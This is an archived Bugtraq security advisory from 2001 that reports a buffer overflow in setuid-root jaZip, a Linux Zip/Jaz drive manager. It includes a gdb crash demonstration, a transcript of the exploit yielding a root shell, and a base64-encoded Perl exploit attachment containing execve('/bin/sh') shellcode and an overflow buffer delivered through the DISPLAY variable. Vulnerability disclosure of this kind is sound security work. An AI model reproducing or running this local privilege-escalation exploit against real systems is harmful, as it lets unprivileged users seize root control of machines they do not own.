![[LWN Logo]](/images/lcorner.png) |
|
![[Timeline]](/images/Included.png) |
Date: Sun, 14 Jan 2001 17:05:48 +0000
From: teleh0r <teleh0r@DOGLOVER.COM>
Subject: Vulnerability in jaZip.
To: BUGTRAQ@SECURITYFOCUS.COM
--------------Boundary-00=_OTW5OLAYS3R76NBXB0LW
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Dear, Bugtraq.
jaZip is a program for managing an Iomega Zip or Jaz drive.
It is often installed setuid root - and because of a buffer
overflow it is possible for regular users to become root.
Please excuse me if this was know. Please note that I can not
guarantee that this information is correct.
Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/
RPMS/jaZip-0.32-2.i386.rpm
[root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
[root@localhost /root]# gdb /usr/X11R6/bin/jazip
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
(gdb) r
Starting program: /usr/X11R6/bin/jazip
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
----
[teleh0r@localhost teleh0r]$ rpm -q jaZip
jaZip-0.32-2
[teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
Address: 0xbffff7ac
bash#
Exploit attached.
Sincerely yours,
teleh0r
--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
--------------Boundary-00=_OTW5OLAYS3R76NBXB0LW
Content-Type: application/x-perl;
name="jazip-exploit.pl"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="jazip-exploit.pl"
IyEvdXNyL2Jpbi9wZXJsCgojIyBqYVppcCBFeHBsb2l0IC8gVGVzdGVkIHZlcnNpb246IGphWmlw
LTAuMzItMiAvIGFubm8gMjAwMAojIyB0ZWxlaDByQGRvZ2xvdmVyLmNvbSAvIGh0dHA6Ly90ZWxl
aDByLmNqYi5uZXQvCgokc2hlbGxjb2RlID0gICAgICAgICAgICAgICAgICAgICAjIFNoZWxsY29k
ZSBieTogVGFlaG8gT2gKICAgICJceGViXHgxZiIuICAgICAgICAgICAgICAgICAgIy8qIGptcCAw
eDFmICAgICAgICAgICAgICAqLwogICAgIlx4NWUiLiAgICAgICAgICAgICAgICAgICAgICAjLyog
cG9wbCAlZXNpICAgICAgICAgICAgICovCiAgICAiXHg4OVx4NzZceDA4Ii4gICAgICAgICAgICAg
ICMvKiBtb3ZsICVlc2ksMHg4KCVlc2kpICAgKi8KICAgICJceDMxXHhjMCIuICAgICAgICAgICAg
ICAgICAgIy8qIHhvcmwgJWVheCwlZWF4ICAgICAgICAqLwogICAgIlx4ODhceDQ2XHgwNyIuICAg
ICAgICAgICAgICAjLyogbW92YiAlZWF4LDB4NyglZXNpKSAgICovCiAgICAiXHg4OVx4NDZceDBj
Ii4gICAgICAgICAgICAgICMvKiBtb3ZsICVlYXgsMHhjKCVlc2kpICAgKi8KICAgICJceGIwXHgw
YiIuICAgICAgICAgICAgICAgICAgIy8qIG1vdmIgJDB4YiwlYWwgICAgICAgICAqLwogICAgIlx4
ODlceGYzIi4gICAgICAgICAgICAgICAgICAjLyogbW92bCAlZXNpLCVlYnggICAgICAgICovCiAg
ICAiXHg4ZFx4NGVceDA4Ii4gICAgICAgICAgICAgICMvKiBsZWFsIDB4OCglZXNpKSwlZWN4ICAg
Ki8KICAgICJceDhkXHg1Nlx4MGMiLiAgICAgICAgICAgICAgIy8qIGxlYWwgMHhjKCVlc2kpLCVl
ZHggICAqLwogICAgIlx4Y2RceDgwIi4gICAgICAgICAgICAgICAgICAjLyogaW50ICQweDgwICAg
ICAgICAgICAgICovCiAgICAiXHgzMVx4ZGIiLiAgICAgICAgICAgICAgICAgICMvKiB4b3JsICVl
YngsJWVieCAgICAgICAgKi8KICAgICJceDg5XHhkOCIuICAgICAgICAgICAgICAgICAgIy8qIG1v
dmwgJWVieCwlZWF4ICAgICAgICAqLwogICAgIlx4NDAiLiAgICAgICAgICAgICAgICAgICAgICAj
LyogaW5jICVlYXggICAgICAgICAgICAgICovCiAgICAiXHhjZFx4ODAiLiAgICAgICAgICAgICAg
ICAgICMvKiBpbnQgJDB4ODAgICAgICAgICAgICAgKi8KICAgICJceGU4XHhkY1x4ZmZceGZmXHhm
ZiIuICAgICAgIy8qIGNhbGwgLTB4MjQgICAgICAgICAgICAqLwogICAgIi9iaW4vc2giOyAgICAg
ICAgICAgICAgICAgICAjLyogLnN0cmluZyBcIi9iaW4vc2hcIiAgICovCgoKJHJldCA9IDB4YmZm
ZmY3YWM7ICAjIE1heSBoYXZlIHRvIGJlIG1vZGlmaWVkLgokbGVuID0gMjEwMDsKJG5vcCA9ICdB
JzsKCmlmIChAQVJHViA9PSAxKSB7CiAgICAkb2Zmc2V0ID0gJEFSR1ZbMF07Cn0KCmZvciAoJGkg
PSAwOyAkaSA8ICgkbGVuIC0gbGVuZ3RoKCRzaGVsbGNvZGUpIC0gMTAwKTsgJGkrKykgewogICAg
JGJ1ZmZlciAuPSAkbm9wOwp9CgokYnVmZmVyIC49ICRzaGVsbGNvZGU7CgpwcmludCgiQWRkcmVz
czogMHgiLCBzcHJpbnRmKCclbHgnLCgkcmV0ICsgJG9mZnNldCkpLCAiXG4iKTsKJG5ld19yZXQg
PSBwYWNrKCdsJywoJHJldCArICRvZmZzZXQpKTsKJGJ1ZmZlciAuPSAkbm9wIHggMzsgIyBNYXkg
aGF2ZSB0byBiZSBtb2RpZmllZC4KCmZvciAoJGkgKz0gbGVuZ3RoKCRzaGVsbGNvZGUpOyAkaSA8
ICRsZW47ICRpICs9IDQpIHsKICAgICRidWZmZXIgLj0gJG5ld19yZXQ7Cn0KCmlmICgkRU5WeydE
SVNQTEFZJ30pIHsKICAgIGRlbGV0ZSgkRU5WeydESVNQTEFZJ30pOwp9Cgpsb2NhbCgkRU5WeydE
SVNQTEFZJ30pID0gJGJ1ZmZlcjsKZXhlYygiL3Vzci9YMTFSNi9iaW4vamF6aXAiKTsK
--------------Boundary-00=_OTW5OLAYS3R76NBXB0LW--